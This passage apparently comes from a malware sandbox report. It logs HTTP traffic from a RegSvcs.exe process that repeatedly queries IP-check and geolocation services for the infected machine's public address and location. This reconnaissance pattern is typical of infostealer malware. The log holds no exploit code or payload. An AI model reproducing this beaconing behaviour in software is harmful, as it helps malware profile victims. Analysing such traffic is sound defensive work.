                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1249716193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:19.115308046 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:19.741142988 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: b51af6d77f22a573687fe58e1a7b081c
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1249718193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:21.421016932 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:22.046936035 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:21 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 61aeae9b82f9fca8a9e09e496d349936
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1249721193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:22.691395998 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:23.316754103 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2a247d4f0e79bb3911475c7acaccd55c
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1249723193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:23.980896950 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:24.627980947 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: af00b6d9b47dddbde35e5bd1c5361cc5
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1249726193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:25.260351896 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:25.887968063 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:25 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 24a4b45fdcc783fb9105b5bf39d959f9
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1249731193.122.6.168807020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:26.496649981 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:27.128807068 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: ebb5e6e0cc637b1cc37ccd68db2a3983
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1249712188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:16 UTC676INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:16 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35797
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tr9v6tG63iIS6PH8JYDZ8iBEGmLeAV3gYKikGYFubm3EFy3yZ%2Bnz%2F26T2yhlLq54zfp3W%2BueHlza1LMAr6mDnfAbHbGnCpkNxyOeVBktgQ5GyktmMLutE2CDvPa2K7gCh5fMlI2p"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe778089d0c40c-EWR
                                                                              2024-10-09 12:45:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1249713188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-09 12:45:17 UTC674INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:17 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35798
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1J2Cdjq9QL0KwhRss7gR4AgLniO6375fsYHvQEvn2RQQOHBlT9u8gSfNjjPjT%2BPh7Lcxei5eUnpE4vJPjg1sdUc0zLLuKp8I3Q7a4LWkny1vkk%2BHj02n4WmF4BQrdTcKpS2uMRA"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe7785bc6f5e66-EWR
                                                                              2024-10-09 12:45:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1249715188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-09 12:45:19 UTC682INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:19 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35800
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rtVOL8vze0F9tZGoS6ZWQB5FXA15%2BnUjvuK69Xt1riVRgRyb5fyB%2FgPaLjSpVyWcS%2BfOIzVUENo9NYpVJL36hpLhSRlYkLVxeyWUE9r1W4RQzQR27JRNeTE%2FARjcOBVHmC%2F%2BI5i0"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe7791ef598c3c-EWR
                                                                              2024-10-09 12:45:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1249717188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:21 UTC674INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:21 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35802
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFTnXRKWfHoP54YzxEv%2BsgxVHeGQrPCbb5XNk3Vlg6UZvvnCIDgb7nUdnXU2RXzSdROD1NTbLPX%2BlU7hss2hMbNU1scmFWZZ2csz2JF1IYXUERDwm7oCLosPojGUMlxAZKDciF3w"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77a06de741cf-EWR
                                                                              2024-10-09 12:45:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1249720188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:22 UTC670INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:22 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35803
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7hTvzEjEp23si1kCyjszSVNwa9W6FyIxv4SQ9VxmCor51X4YVai0fG5HCnkZerBJluF2Nt8Oz2EgBaNYcqkdgRdAUajHmlNLrXyFvPXgki3pHWJElF5fjeEFUeJdsq05jpGrhUJ"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77a85ab942f2-EWR
                                                                              2024-10-09 12:45:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1249722188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-09 12:45:23 UTC676INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:23 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35804
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=REFHuOyLznptzUY4IsW66MXILoWiT0%2Bcg9%2FDMEyIJgEQXeQrHW2ijtGw6gmNeS9Q1JUqAFs9XQComXgxZSdloKXMrxVOqUS4zgt4VTaLtvhi2FHbajIus%2FihFvdDvqOHZ8AEJ1Ra"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77b03efa1988-EWR
                                                                              2024-10-09 12:45:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-09 12:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1249724188.114.96.34437020C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-09 12:45:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-09 12:45:25 UTC682INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:25 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 35806
                                                                              Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aES0F1gUnR0f%2Bs5VrKBLO3%2FkdkW79faiC9ZlQnFSuj0%2Bj1HB0CKlQGUNbDPQijrtilUPF8GxhfDxUhE55NbNJrVtDGNH%2B0UpHQNQLO6Jk%2BYFfFoTgZ%2FHUeyXAmfyHEu1a1HqsTWV"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cfe77b86fba430e-EWR
